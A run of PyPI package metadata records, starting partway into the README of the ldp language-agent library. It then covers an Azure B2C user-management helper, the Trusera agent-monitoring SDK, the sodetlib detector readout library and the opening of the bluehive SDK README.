```py from ldp.agent import Agent from ldp.graph import LLMCallOp class AgentState: def __init__(self, messages, tools): self.messages = messages self.tools = tools class SimpleAgent(Agent): def __init__(self, **kwargs): super().__init__(**kwargs) self.llm_call_op = LLMCallOp() async def init_state(self, tools): return AgentState([], tools) async def get_asv(self, agent_state, obs): action = await self.llm_call_op( config={"name": "gpt-4o", "temperature": 0.1}, msgs=agent_state.messages + obs, tools=agent_state.tools, ) new_state = AgentState( messages=agent_state.messages + obs + [action], tools=agent_state.tools ) return action, new_state, 0.0 ``` An agent has two methods: ```py agent_state = await agent.init_state(tools=tools) new_action, new_agent_state, value = await agent.get_asv(agent_state, obs) ``` - The `get_asv(agent_state, obs)` method chooses an action (`a`) conditioned on the observation messages, returning the next agent state (`s`) and a value estimate (`v`). - The first argument, `agent_state`, is an optional container for environment-specific objects such as documents for PaperQA or lookup results for HotpotQA, as well as more general objects such as memories, which could include a list of previous actions and observations. `agent_state` may be set to `None` if memories are not being used. - The second argument, `obs`, is not the complete list of all prior observations, but rather the returned value from `env.step`. - The `value` is the agent's state/action value estimate used for reinforcement learning training. It may default to 0. ## A plain python agent Want to just run python code?
No problem - here's a minimal example of an Agent that is deterministic: ```py from aviary.core import Message, Tool, ToolCall, ToolRequestMessage from ldp.agent import Agent class NoThinkAgent(Agent): async def init_state(self, tools): return None async def get_asv(self, agent_state, obs): tool_call = ToolCall.from_name("specific_tool_call", arg1="foo") action = ToolRequestMessage(tool_calls=[tool_call]) return await Agent.wrap_action(action), None, 0.0 ``` This agent has a state of `None`, just makes one specific tool call with `arg1="foo"`, and then converts that into an action. The only "magic" line of code is the `wrap_action`, which just converts the action constructed by plain python into a node in a compute graph - see more below. ## Stochastic Computation Graph (SCG) For more advanced use cases, LDP features a stochastic computation graph [^2] which enables differentiation with respect to agent parameters (including the weights of the LLM). You should install the `scg` subpackage to work with it: ```bash pip install ldp[scg] ``` The example computation graph below illustrates the functionality: ```py from ldp.graph import FxnOp, LLMCallOp, PromptOp, compute_graph op_a = FxnOp(lambda x: 2 * x) async with compute_graph(): op_result = op_a(3) ``` The code cell above creates and executes a computation graph that doubles the input. The computation graph gradients and executions are saved in a context for later use, such as in training updates. For example: ```py print(op_result.compute_grads()) ``` A more complex example is given below for an agent that possesses memory.
```py @compute_graph() async def get_asv(self, agent_state, obs): # Update state with new observations next_state = agent_state.get_next_state(obs) # Retrieve relevant memories query = await self._query_factory_op(next_state.messages) memories = await self._memory_op(query, matches=self.num_memories) # Format memories and package messages formatted_memories = await self._format_memory_op(self.memory_prompt, memories) memory_prompt = await self._prompt_op(memories=formatted_memories) packaged_messages = await self._package_op( next_state.messages, memory_prompt=memory_prompt, use_memories=bool(memories) ) # Make LLM call and update state config = await self._config_op() result = await self._llm_call_op( config, msgs=packaged_messages, tools=next_state.tools ) next_state.messages.extend([result]) return result, next_state, 0.0 ``` We use differentiable ops to ensure there is an edge in the compute graph from the LLM result (action) to components such as memory retrieval as well as the query used to retrieve the memory. Why use an SCG? Aside from the ability to take gradients, using the SCG enables tracking of all inputs/outputs to the ops and serialization/deserialization of the SCG such that it can be easily saved and loaded. Input/output tracking also makes it easier to perform fine-tuning or reinforcement learning on the underlying LLMs. ## Generic Support The `Agent` (as well as classes in `agent.ops`) are [generics](https://en.wikipedia.org/wiki/Generic_programming), which means: - `Agent` is designed to support arbitrary types - Subclasses can precisely specify state types, making the code more readable If you are new to Python generics (`typing.Generic`), please read about them in [Python `typing`](https://docs.python.org/3/library/typing.html#generics). Below is how to specify an agent with a custom state type. 
```py from dataclasses import dataclass, field from datetime import datetime from ldp.agent import Agent @dataclass class MyComplexState: vector: list[float] timestamp: datetime = field(default_factory=datetime.now) class MyAgent(Agent[MyComplexState]): """Some agent that is now type-checked to match the custom state.""" ``` ## References [^1]: Narayanan, S., Braza, J.D., Griffiths, R.R., Ponnapati, M., Bou, A., Laurent, J., Kabeli, O., Wellawatte, G., Cox, S., Rodriques, S.G. and White, A.D., 2024. [Aviary: training language agents on challenging scientific tasks.](https://arxiv.org/abs/2412.21154) arXiv preprint arXiv:2412.21154. [^2]: Schulman, J., Heess, N., Weber, T. and Abbeel, P., 2015. [Gradient estimation using stochastic computation graphs.](https://proceedings.neurips.cc/paper_files/paper/2015/hash/de03beffeed9da5f3639a621bcab5dd4-Abstract.html) Advances in Neural Information Processing Systems, 28.
text/markdown
null
FutureHouse technical staff <hello@futurehouse.org>
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2025 FutureHouse Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "P...
[]
null
null
>=3.11
[]
[]
[]
[ "aiofiles", "fhaviary>=0.32.0", "fhlmi", "httpx-aiohttp", "numpy>=1.20", "pydantic~=2.0", "tenacity", "tiktoken", "tqdm", "typing-extensions; python_version <= \"3.11\"", "fhaviary[xml]>=0.19; extra == \"dev\"", "fhlmi[dev]; extra == \"dev\"", "httpx; extra == \"dev\"", "ipython>=8; extra ...
[]
[]
[]
[ "issues, https://github.com/Future-House/ldp/issues", "repository, https://github.com/Future-House/ldp" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:19:37.824961
ldp-0.44.0.tar.gz
4,836,205
f0/e8/db68de582dc843548b5d776aff767a47c48188876fec9df8aa67130c14db/ldp-0.44.0.tar.gz
source
sdist
null
false
d3475643e30e05faf406bab6d6035ded
1d3fbdc346532ccf17219a8b1719747772dfe2f5572072aba14bab3287d0d6a8
f0e8db68de582dc843548b5d776aff767a47c48188876fec9df8aa67130c14db
null
[ "LICENSE" ]
822
2.4
eam-b2c-helper
0.1.44
A package to interact with ms graph /users functionality
# This package is used to add data to Cosmos DB, which is required during onboarding of a client or adding a new vendor to the 8am system. B2CHelper: build_user_object(): This function is used to format the user object according to the MS AD schema. It takes the user_details object from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the formatted user object. The last 4 fields within the user object are custom fields, marked as such using the extension_id. get_token() This function is used to get the token from the MS AD B2C. It takes the client_id, client_secret, tenant_id, and the scope as parameters and returns the token. get_auth_header() This function is used to get the authorization header for the MS AD B2C. It uses the token string returned from the get_token() function and structures it into a Bearer token along with a Content-Type header for ease of use. create_item() This function is used to add a new user to the MS AD B2C directory. It takes the user object and the auth_header as parameters and returns the response from the MS Graph API. update_item() This function is used to update a user in the MS AD B2C directory. It takes the user object and the auth_header as parameters and returns the response from the MS Graph API. delete_item() This function is used to delete a user from the MS AD B2C directory. It takes the user object and the auth_header as parameters and returns the response from the MS Graph API. get_user() This function is used to get a user from the MS AD B2C directory. It takes the user id as a parameter, removes the @odata.context field and returns the single user object. compile_entire_user_list() This function is used to get the entire list of users from the MS AD B2C directory. By default, the MS Graph API returns 100 users per page; this function uses the @odata.nextLink field to get the next page of users until there are no more pages left.
It returns a list of user objects, combined from each successive call made to the MS Graph API. This function uses the argument filter_extension to filter users by either company, user role, or nothing at all (return all users from the directory). get_users() This function is used to get a list of users from the MS AD B2C directory. It takes a company id and a user role as optional parameters and returns a list of user objects, possibly filtered by the company and user role. Based on which parameters are passed, it will call the compile_entire_user_list() function with the appropriate filter_extension. The filter extension is appended to the MS Graph API call to filter the users. create_user() This function is used to create a new user in the MS AD B2C directory. It takes the user_details object from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. create_users() This function is used to create multiple users in the MS AD B2C directory. It takes a list of user_details objects from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. update_user() This function is used to update a user in the MS AD B2C directory. It takes the user_details object from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. update_users() This function is used to update multiple users in the MS AD B2C directory. It takes a list of user_details objects from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. delete_user() This function is used to delete a user from the MS AD B2C directory. It takes the user_id from the 8am Web App front end and returns the response from the MS Graph API.
delete_users() This function is used to delete multiple users from the MS AD B2C directory. It takes a list of user_ids from the 8am Web App front end and returns the response from the MS Graph API.
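The @odata.nextLink pagination described for compile_entire_user_list() can be sketched as a simple loop: fetch a page, collect its `value` entries, and follow the `@odata.nextLink` URL until it is absent. The helper below is a hypothetical illustration (not the package's actual code); `fetch_page` stands in for the authenticated MS Graph request and is assumed to return the decoded JSON response for a given URL.

```python
def compile_user_list(fetch_page, filter_extension=""):
    """Collect all users by following @odata.nextLink until no pages remain.

    `fetch_page` is a hypothetical stand-in for the authenticated MS Graph
    call: it takes a URL and returns the decoded JSON response as a dict.
    `filter_extension` mirrors the package's argument of the same name and
    is appended to the initial request URL.
    """
    url = "https://graph.microsoft.com/v1.0/users" + filter_extension
    users = []
    while url:
        page = fetch_page(url)
        # Each page carries up to 100 users in its "value" array.
        users.extend(page.get("value", []))
        # The next page, if any, is linked via @odata.nextLink;
        # when the key is absent, the loop ends.
        url = page.get("@odata.nextLink")
    return users
```

In get_users() terms, the filter_extension would be a query-string suffix (e.g. an OData `$filter` expression on company or user role) appended to the first URL; subsequent pages are fetched via the nextLink URLs the API returns.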
text/markdown
null
Dave Gunn <daveg@8amsolutions.com>
null
null
null
null
[ "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3" ]
[]
null
null
>=3.8
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.0.1 CPython/3.11.0
2026-02-19T22:18:55.947161
eam_b2c_helper-0.1.44.tar.gz
6,643
9e/16/3e59fe7e37d6a1db7afd56ddf62c77882fda5d29563c9ac14ba61c8d54e9/eam_b2c_helper-0.1.44.tar.gz
source
sdist
null
false
b63a52fdb08ad7477898348dbdfdbb54
81dddfff347f950be526e7c39d63da5e599b015878b6a9b3024bca031a1d4375
9e163e59fe7e37d6a1db7afd56ddf62c77882fda5d29563c9ac14ba61c8d54e9
null
[]
238
2.3
trusera-sdk
1.0.0
Python SDK for monitoring and intercepting AI agent actions with Trusera
# Trusera Python SDK [![PyPI version](https://badge.fury.io/py/trusera-sdk.svg)](https://badge.fury.io/py/trusera-sdk) [![Python versions](https://img.shields.io/pypi/pyversions/trusera-sdk.svg)](https://pypi.org/project/trusera-sdk/) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Python SDK for monitoring **and intercepting** AI agent actions with [Trusera](https://trusera.dev). Track LLM invocations, tool calls, data access, and enforce Cedar security policies before actions execute. ## Installation ```bash pip install trusera-sdk ``` ### Optional Dependencies ```bash # Framework integrations pip install trusera-sdk[langchain] pip install trusera-sdk[crewai] pip install trusera-sdk[autogen] # LLM client wrappers pip install trusera-sdk[openai] pip install trusera-sdk[anthropic] # Everything pip install trusera-sdk[all] # Development tools pip install trusera-sdk[dev] ``` ## Quick Start: Passive Monitoring ```python from trusera_sdk import TruseraClient, Event, EventType client = TruseraClient(api_key="tsk_your_api_key") agent_id = client.register_agent(name="my-agent", framework="custom") client.track(Event( type=EventType.TOOL_CALL, name="web_search", payload={"query": "latest AI news"}, )) client.close() ``` ## Active Interception (v0.3.0+) The SDK now supports **active interception** - evaluating agent actions against Cedar policies *before* they execute. Use `intercept()` for a one-liner setup, or `TruseraInterceptor` for full control. 
### `intercept()` - One-Liner Setup ```python import trusera_sdk client = trusera_sdk.TruseraClient(api_key="tsk_...") client.register_agent("my-agent", "custom") # Intercept all HTTP calls (requests, httpx, urllib3) interceptor = trusera_sdk.intercept(client, enforcement="block") # Your agent code runs normally - policy violations raise PolicyViolationError import requests requests.get("https://allowed-api.com/data") # OK requests.get("https://blocked-api.com/data") # Raises PolicyViolationError interceptor.uninstall() ``` ### `TruseraInterceptor` - Full Control ```python from trusera_sdk import TruseraClient, TruseraInterceptor from trusera_sdk.policy_cache import PolicyCache client = TruseraClient(api_key="tsk_...") cache = PolicyCache(client=client, refresh_interval=30) with TruseraInterceptor(client=client, policy_cache=cache, enforcement="warn") as i: # All outbound HTTP is evaluated against Cedar policies # Warn mode logs violations but allows requests to proceed pass ``` ### Enforcement Modes | Mode | Behavior | |------|----------| | `block` | Raise `PolicyViolationError` and prevent the action | | `warn` | Log a warning to stderr, allow the action | | `log` | Silently record the violation, allow the action | ## Using the Decorator ```python from trusera_sdk import TruseraClient, monitor, set_default_client, EventType client = TruseraClient(api_key="tsk_your_api_key") client.register_agent("my-agent", "custom") set_default_client(client) @monitor(event_type=EventType.TOOL_CALL) def search_database(query: str) -> list[dict]: return [{"id": 1, "title": "Result"}] @monitor(event_type=EventType.LLM_INVOKE, name="gpt4_call") async def call_llm(prompt: str) -> str: return "AI response" ``` ## Framework Integrations ### LangChain (Active Interception) ```python from trusera_sdk import TruseraClient from trusera_sdk.policy_cache import PolicyCache from trusera_sdk.integrations.langchain_interceptor import TruseraLangChainInterceptor client = 
TruseraClient(api_key="tsk_...") cache = PolicyCache(client=client) with TruseraLangChainInterceptor(client=client, policy_cache=cache, enforcement="block"): # BaseTool._run and BaseLLM._generate are now policy-checked agent.run("Your query here") ``` ### LangChain (Passive Monitoring) ```python from trusera_sdk.integrations.langchain import TruseraCallbackHandler handler = TruseraCallbackHandler(client) llm = OpenAI(callbacks=[handler]) ``` ### CrewAI (Active Interception) ```python from trusera_sdk.integrations.crewai_interceptor import TruseraCrewAIInterceptor with TruseraCrewAIInterceptor(client=client, policy_cache=cache, enforcement="warn"): crew.kickoff() ``` ### AutoGen (Active Interception) ```python from trusera_sdk.integrations.autogen_interceptor import TruseraAutoGenInterceptor interceptor = TruseraAutoGenInterceptor(client=client, policy_cache=cache, enforcement="block") interceptor.install() # Optionally wrap individual agent functions interceptor.intercept_agent(my_agent) ``` ### OpenAI / Anthropic (LLM Interceptor) ```python from openai import OpenAI from trusera_sdk.integrations.llm_interceptor import TruseraLLMInterceptor llm_interceptor = TruseraLLMInterceptor( client=trusera_client, policy_cache=cache, enforcement="warn", redact_pii=True, # Redact emails, phones, SSNs from logged prompts ) openai_client = OpenAI() llm_interceptor.wrap_openai(openai_client) # Tool-use calls in responses are now policy-checked # PII is redacted from logged prompts (never from actual API calls) ``` ## Policy Cache The `PolicyCache` fetches Cedar policies from the Trusera API and evaluates them locally (<1ms). It runs a background thread to keep policies fresh. ```python from trusera_sdk.policy_cache import PolicyCache cache = PolicyCache( client=trusera_client, refresh_interval=60, # Seconds between refreshes (default: 60) stale_ttl=300, # Serve stale policies for this long when API is down (default: 300) ) # Manual cache invalidation (e.g. 
on webhook) cache.invalidate() # Clean shutdown cache.stop() ``` ## PII Redaction ```python from trusera_sdk import PIIRedactor redactor = PIIRedactor() redactor.redact_text("Email: john@example.com") # => "Email: [REDACTED_EMAIL]" redactor.redact({"user": "john@example.com", "age": 30}) # => {"user": "[REDACTED_EMAIL]", "age": 30} ``` ## Event Types - `EventType.TOOL_CALL` - Tool or function invocations - `EventType.LLM_INVOKE` - LLM API calls - `EventType.DATA_ACCESS` - Database queries, file reads - `EventType.API_CALL` - External API requests - `EventType.FILE_WRITE` - File system modifications - `EventType.DECISION` - Agent decision points - `EventType.POLICY_VIOLATION` - Cedar policy violations (new in 0.3.0) - `EventType.INTERCEPTION` - Intercepted HTTP requests (new in 0.3.0) ## Migration from v0.2 to v0.3 v0.3.0 is fully backward compatible. All existing `monitor()`, `TruseraClient`, and `StandaloneInterceptor` APIs work unchanged. **New in v0.3.0:** - `TruseraInterceptor` - Multi-library HTTP interceptor (requests + httpx + urllib3) - `intercept()` - One-liner convenience function - `PolicyCache` - Background-refreshing policy cache - `PolicyViolationError` - Typed exception for blocked actions - `EnforcementMode` - Enum for block/warn/log - `PIIRedactor` - PII detection and redaction - Framework interceptors: LangChain, CrewAI, AutoGen, OpenAI/Anthropic - New event types: `POLICY_VIOLATION`, `INTERCEPTION` ## Configuration ```python client = TruseraClient( api_key="tsk_your_api_key", base_url="https://api.trusera.dev", flush_interval=5.0, batch_size=100, timeout=10.0, ) ``` ## Development ```bash git clone https://github.com/Trusera/ai-bom.git cd ai-bom/trusera-agent-sdk pip install -e ".[dev]" pytest ruff check . 
``` ## Documentation Full documentation at [docs.trusera.dev/sdk/python](https://docs.trusera.dev/sdk/python) ## Support - Website: [trusera.dev](https://trusera.dev) - Documentation: [docs.trusera.dev](https://docs.trusera.dev) - Issues: [GitHub Issues](https://github.com/Trusera/ai-bom/issues) - Email: dev@trusera.dev ## License Apache License 2.0 - see [LICENSE](LICENSE) file for details.
text/markdown
null
Trusera <dev@trusera.dev>
null
null
Apache-2.0
agents, ai, cedar, interceptor, monitoring, observability, policy, security
[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "P...
[]
null
null
>=3.9
[]
[]
[]
[ "httpx>=0.24.0", "anthropic>=0.18.0; extra == \"all\"", "crewai>=0.1.0; extra == \"all\"", "langchain-core>=0.1.0; extra == \"all\"", "openai>=1.0.0; extra == \"all\"", "pyautogen>=0.2.0; extra == \"all\"", "requests>=2.28.0; extra == \"all\"", "anthropic>=0.18.0; extra == \"anthropic\"", "pyautogen...
[]
[]
[]
[ "Homepage, https://trusera.dev", "Repository, https://github.com/Trusera/ai-bom", "Documentation, https://docs.trusera.dev/sdk/python" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:17:15.792052
trusera_sdk-1.0.0.tar.gz
57,983
19/0c/b5886e7c69c21dc4f139335ce45e60af3eaf7c1b3a0886ed415a706a806e/trusera_sdk-1.0.0.tar.gz
source
sdist
null
false
d358c8dafdba4d95d6c938ac60d1ebb8
6ea3f6bcfad5369ab0a1cc33d02662e14564a2ff273e1a2a85d5e0d0c4005474
190cb5886e7c69c21dc4f139335ce45e60af3eaf7c1b3a0886ed415a706a806e
null
[]
233
2.4
sodetlib
0.6.4
Simons Observatory detector readout library.
======== sodetlib ======== | |pypi| |versions| |license| |docs| This repository contains tools for controlling the Simons Observatory readout system, and performing initial data analysis for detector characterization. Installation ------------ Instructions for setting up a SMuRF server can be found on `Confluence`_. For offline analysis of sodetlib data files, you can also install sodetlib by cloning this repo and running:: $ python -m pip install -r requirements.txt $ python -m pip install . .. _`Confluence`: https://simonsobs.atlassian.net/wiki/spaces/PRO/pages/11041372/Smurf+Software+Setup Documentation ------------- The sodetlib documentation can be built using Sphinx. Once sodetlib and its dependencies are installed run:: $ cd docs/ $ make html The documentation is also hosted on `Read the Docs`_. .. _`Read the Docs`: https://sodetlib.readthedocs.io/en/latest/ Contributing ------------ Contributions are very welcome! Pull requests must be approved by one member of the simonsobs team before being merged. Licence ------- This project is licensed under the BSD 2-Clause License - see the `LICENSE`_ file for details. .. _`LICENSE`: LICENSE .. |pypi| image:: https://img.shields.io/pypi/v/sodetlib :target: https://pypi.org/project/sodetlib/ :alt: PyPI Package .. |versions| image:: https://img.shields.io/pypi/pyversions/sodetlib :alt: PyPI - Python Version .. |license| image:: https://img.shields.io/pypi/l/sodetlib :target: LICENSE :alt: PyPI - License .. |docs| image:: https://readthedocs.org/projects/sodetlib/badge/?version=latest :target: https://sodetlib.readthedocs.io/en/latest/?badge=latest :alt: Documentation Status
text/x-rst
null
null
null
null
null
null
[ "Intended Audience :: Science/Research", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programm...
[]
null
null
>=3.8
[]
[]
[]
[ "lmfit", "matplotlib", "numpy", "pandas", "pysmurf-slac", "pyyaml", "scipy", "tqdm", "pytest; extra == \"dev\"", "setuptools-scm; extra == \"dev\"", "ipython; extra == \"scripts\"", "traitlets; extra == \"scripts\"" ]
[]
[]
[]
[ "Bug Tracker, https://github.com/simonsobs/sodetlib/issues", "Documentation, https://sodetlib.readthedocs.io", "Homepage, https://github.com/simonsobs/sodetlib", "Source Code, https://github.com/simonsobs/sodetlib" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:17:01.535721
sodetlib-0.6.4.tar.gz
142,056
4d/e5/84b682a5d62c25fd6c7b626f408778853f89d6eaaffaadebcce148783023/sodetlib-0.6.4.tar.gz
source
sdist
null
false
30d7338bba6e4f751a83dd9ea98daa5c
fbd98d0bc136be31fe802ff2b704d635648073ef4517f40271dc57befec9a8df
4de584b682a5d62c25fd6c7b626f408778853f89d6eaaffaadebcce148783023
BSD-2-Clause
[ "LICENSE" ]
280
2.3
bluehive
0.1.0a26
The official Python library for the bluehive API
# BlueHive Python API library <!-- prettier-ignore --> [![PyPI version](https://img.shields.io/pypi/v/bluehive.svg?label=pypi%20(stable))](https://pypi.org/project/bluehive/) The BlueHive Python library provides convenient access to the BlueHive REST API from any Python 3.9+ application. The library includes type definitions for all request params and response fields, and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx). It is generated with [Stainless](https://www.stainless.com/). ## MCP Server Use the BlueHive MCP Server to enable AI assistants to interact with this API, allowing them to explore endpoints, make test requests, and use documentation to help integrate this SDK into your application. [![Add to Cursor](https://cursor.com/deeplink/mcp-install-dark.svg)](https://cursor.com/en-US/install-mcp?name=%40bluehive%2Fsdk-mcp&config=eyJjb21tYW5kIjoibnB4IiwiYXJncyI6WyIteSIsIkBibHVlaGl2ZS9zZGstbWNwIl0sImVudiI6eyJCTFVFSElWRV9BUElfS0VZIjoiTXkgQVBJIEtleSJ9fQ) [![Install in VS 
